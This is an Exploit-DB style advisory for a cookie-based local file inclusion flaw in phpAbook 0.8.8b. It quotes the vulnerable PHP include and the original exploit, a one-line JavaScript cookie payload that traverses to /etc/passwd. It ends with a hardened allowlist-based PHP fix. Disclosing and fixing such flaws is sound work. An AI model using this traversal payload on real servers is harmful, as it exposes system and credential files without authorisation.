vendor: phpAbook
by: JosS
CVSS: 7.5 HIGH
CWE: Local File Inclusion
Product Name: phpAbook
Affected Version From: 0.8.8b
Affected Version To: 0.8.8b
Patch Exists: NO
2008

phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability

This exploit targets phpAbook version 0.8.8b and takes advantage of a local file inclusion vulnerability in include/config.inc.php. The third space-separated field of the 'userInfo' cookie is inserted into an include() path without validation, so by manipulating the cookie an attacker can include arbitrary files on the server, potentially accessing sensitive information. The exploit code is provided as a JavaScript snippet that sets the 'userInfo' cookie to include the path to the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update phpAbook to a version that includes a patch for this issue. Additionally, ensuring that the 'magic_quotes_gpc' setting is set to 'On' can provide some level of protection against this type of attack.
Source

Exploit-DB raw data:

# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability
# url: http://sourceforge.net/projects/phpabook/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off

vuln file: include/config.inc.php
vuln code:

x:  >...
61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") {
	$userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);
	$userName = $userArray[0];
	$userID = $userArray[1];
	$userLang = $userArray[2];
	include("include/lang/$userLang/inc.messages.php");
67:	}
x:  <...

Proof of Concept (function 'explode' PHP):
[0] = JosS;
[1] = JosS;
[2] = ../../../../etc/passwd%00; ---> INCLUDE

exploit: 
javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/";

Ingenious work :D

# milw0rm.com [2008-10-05]
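
A hardened form of the include from include/config.inc.php quoted above, as an added example that is not part of the advisory or of phpAbook: the language field is checked against an allowlist and the resolved path is confined to the language directory. The function name resolveLangFile, the language codes and the demo cookie values are assumptions made for illustration.

```php
<?php
// Added example, not phpAbook code. resolveLangFile() and the language codes
// in $allowed are hypothetical. The check does not depend on magic_quotes_gpc,
// which was removed in PHP 5.4.

function resolveLangFile(string $cookie, string $baseDir, array $allowed, string $default): string
{
    // Same cookie layout as the original code: "name id lang", space separated.
    $parts = explode(' ', $cookie);
    $lang  = $parts[2] ?? $default;

    // 1. Allowlist: only known directory names pass, so "../" sequences and
    //    NUL bytes never reach the include path.
    if (!in_array($lang, $allowed, true)) {
        $lang = $default;
    }

    // 2. Defence in depth: resolve the final path and confirm that it still
    //    sits inside the language directory.
    $root = realpath($baseDir);
    $file = realpath("$baseDir/$lang/inc.messages.php");
    if ($root === false || $file === false
        || strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $file;
}

// Constructed demo: a temporary tree holding a single language file.
$base = sys_get_temp_dir() . '/abook_lang_' . getmypid();
mkdir("$base/en", 0700, true);
file_put_contents("$base/en/inc.messages.php", "<?php // constructed sample\n");

$allowed = ['en', 'de'];   // assumed language directories
$cookies = ['alice 1 en', 'alice 1 ../../../../etc/passwd', 'alice 1'];
foreach ($cookies as $cookie) {
    // Every value resolves to .../en/inc.messages.php; the traversal value
    // and the short cookie both fall back to the default language.
    echo $cookie, ' => ', resolveLangFile($cookie, $base, $allowed, 'en'), PHP_EOL;
}
// In the application: include resolveLangFile($_COOKIE['userInfo'] ?? '', ...);
```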